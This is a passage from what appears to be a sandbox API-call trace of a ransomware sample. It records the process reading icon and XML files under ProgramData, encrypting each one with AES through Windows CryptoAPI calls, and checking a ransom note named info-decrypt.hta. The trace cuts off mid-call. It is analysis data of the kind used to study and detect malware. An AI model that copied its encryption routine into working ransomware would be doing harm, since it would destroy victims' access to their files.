ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0155.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0155.434] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpFilePart=0x0) returned 0x5c [0155.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0155.434] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), fInfoLevelId=0x0, lpFileInformation=0x35df96c | out: lpFileInformation=0x35df96c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2db04ce, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2db04ce, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x72ee)) returned 1 [0155.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0155.434] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpFilePart=0x0) returned 0x5c [0155.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0155.434] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0155.434] GetFileType (hFile=0x31c) returned 0x1 [0155.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0155.435] GetFileType (hFile=0x31c) returned 0x1 [0155.435] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x72ee [0155.435] ReadFile (in: hFile=0x31c, lpBuffer=0x35dfbd4, nNumberOfBytesToRead=0x72ee, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x35dfbd4*, lpNumberOfBytesRead=0x691f29c*=0x72ee, lpOverlapped=0x0) returned 1 [0156.052] CloseHandle (hObject=0x31c) returned 1 [0156.114] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf9d0) returned 1 [0156.115] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x35e7588 | out: pbBuffer=0x35e7588) returned 1 [0156.953] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x3622144, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f490) returned 1 [0156.953] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0156.953] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0156.953] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f050) returned 1 [0156.953] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0156.953] CryptSetKeyParam (hKey=0xb7f050, dwParam=0x4, pbData=0x3622224*=0x1, dwFlags=0x0) returned 1 [0156.953] CryptSetKeyParam (hKey=0xb7f050, dwParam=0x1, pbData=0x36221f0, dwFlags=0x0) returned 1 [0156.953] CryptEncrypt (in: hKey=0xb7f050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3622234*, pdwDataLen=0x691f268*=0x72f0, dwBufLen=0x72f0 | out: pbData=0x3622234*, pdwDataLen=0x691f268*=0x72f0) returned 1 [0157.189] CryptEncrypt (in: hKey=0xb7f050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3629548*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3629548*, pdwDataLen=0x691f270*=0x10) returned 1 [0157.190] CryptDestroyKey (hKey=0xb7f490) returned 1 [0157.190] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0157.190] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0157.190] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpFilePart=0x0) returned 0x5c [0157.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0157.190] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0157.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0157.192] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpFilePart=0x0) returned 0x5e [0157.192] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0157.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0157.192] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0157.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0157.192] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpFilePart=0x0) returned 0x5e [0157.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0157.192] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), fInfoLevelId=0x0, lpFileInformation=0x362a4f4 | out: lpFileInformation=0x362a4f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5b43, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2ca5b43, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c10f535, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14668)) returned 1 [0157.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0157.198] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpFilePart=0x0) returned 0x5e [0157.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0157.198] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0157.199] GetFileType (hFile=0x45c) returned 0x1 [0157.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0157.199] GetFileType (hFile=0x45c) returned 0x1 [0157.199] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x14668 [0157.199] ReadFile (in: hFile=0x45c, lpBuffer=0x3756690, nNumberOfBytesToRead=0x14668, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3756690*, lpNumberOfBytesRead=0x691f29c*=0x14668, lpOverlapped=0x0) returned 1 [0157.328] CloseHandle (hObject=0x45c) returned 1 [0157.328] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdff20) returned 1 [0157.329] CryptGenRandom (in: hProv=0xbdff20, dwLen=0x10, pbBuffer=0x376d3c8 | out: pbBuffer=0x376d3c8) returned 1 [0158.258] CryptImportKey (in: hProv=0xbdff20, pbData=0x36da708, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fc50) returned 1 [0158.258] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.258] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.258] CryptDuplicateKey (in: hKey=0xb7fc50, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f710) returned 1 [0158.258] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.259] CryptSetKeyParam (hKey=0xb7f710, dwParam=0x4, pbData=0x36da7e8*=0x1, dwFlags=0x0) returned 1 [0158.259] CryptSetKeyParam (hKey=0xb7f710, dwParam=0x1, pbData=0x36da7b4, dwFlags=0x0) returned 1 [0158.259] CryptEncrypt (in: hKey=0xb7f710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36da7f8*, pdwDataLen=0x691f268*=0x14670, dwBufLen=0x14670 | out: pbData=0x36da7f8*, pdwDataLen=0x691f268*=0x14670) returned 1 [0158.260] CryptEncrypt (in: hKey=0xb7f710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36eee8c*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x36eee8c*, pdwDataLen=0x691f270*=0x10) returned 1 [0158.261] CryptDestroyKey (hKey=0xb7fc50) returned 1 [0158.261] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0158.261] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0158.261] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpFilePart=0x0) returned 0x5e [0158.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0158.261] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0158.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0158.263] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpFilePart=0x0) returned 0x5e [0158.263] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0158.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0158.263] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0158.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0158.263] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpFilePart=0x0) returned 0x5e [0158.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0158.263] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), fInfoLevelId=0x0, lpFileInformation=0x36efe44 | out: lpFileInformation=0x36efe44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c59889, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c59889, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1cdc0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x536)) returned 1 [0158.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0158.561] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpFilePart=0x0) returned 0x5e [0158.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0158.561] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0158.561] GetFileType (hFile=0x328) returned 0x1 [0158.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0158.561] GetFileType (hFile=0x328) returned 0x1 [0158.561] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x536 [0158.561] ReadFile (in: hFile=0x328, lpBuffer=0x391c648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x391c648*, lpNumberOfBytesRead=0x691f29c*=0x536, lpOverlapped=0x0) returned 1 [0158.563] CloseHandle (hObject=0x328) returned 1 [0158.563] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbe0cf0) returned 1 [0158.564] CryptGenRandom (in: hProv=0xbe0cf0, dwLen=0x10, pbBuffer=0x391d99c | out: pbBuffer=0x391d99c) returned 1 [0159.779] CryptImportKey (in: hProv=0xbe0cf0, pbData=0x3691504, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f710) returned 1 [0159.779] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.779] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.779] CryptDuplicateKey (in: hKey=0xb7f710, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f0d0) returned 1 [0159.779] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.779] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x4, pbData=0x36915e4*=0x1, dwFlags=0x0) returned 1 [0159.779] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x1, pbData=0x36915b0, dwFlags=0x0) returned 1 [0159.779] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36915f4*, pdwDataLen=0x691f268*=0x540, dwBufLen=0x540 | out: pbData=0x36915f4*, pdwDataLen=0x691f268*=0x540) returned 1 [0159.779] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3691b58*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3691b58*, pdwDataLen=0x691f270*=0x10) returned 1 [0159.780] CryptDestroyKey (hKey=0xb7f710) returned 1 [0159.780] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0159.780] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0159.781] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpFilePart=0x0) returned 0x5e [0159.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0159.781] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0159.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0159.782] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpFilePart=0x0) returned 0x5f [0159.782] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0159.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0159.783] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0159.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0159.783] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpFilePart=0x0) returned 0x5f [0159.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0159.783] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), fInfoLevelId=0x0, lpFileInformation=0x3692b10 | out: lpFileInformation=0x3692b10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cf1dfd, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2cf1dfd, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9)) returned 1 [0159.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0159.783] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpFilePart=0x0) returned 0x5f [0159.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0159.783] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0159.783] GetFileType (hFile=0x32c) returned 0x1 [0159.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0159.783] GetFileType (hFile=0x32c) returned 0x1 [0159.783] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xcaa9 [0159.784] ReadFile (in: hFile=0x32c, lpBuffer=0x3692d88, nNumberOfBytesToRead=0xcaa9, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3692d88*, lpNumberOfBytesRead=0x691f29c*=0xcaa9, lpOverlapped=0x0) returned 1 [0159.786] CloseHandle (hObject=0x32c) returned 1 [0159.786] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf9d0) returned 1 [0159.787] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x369fef8 | out: pbBuffer=0x369fef8) returned 1 [0161.750] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x3775a64, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f590) returned 1 [0161.750] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.750] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.750] CryptDuplicateKey (in: hKey=0xb7f590, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: 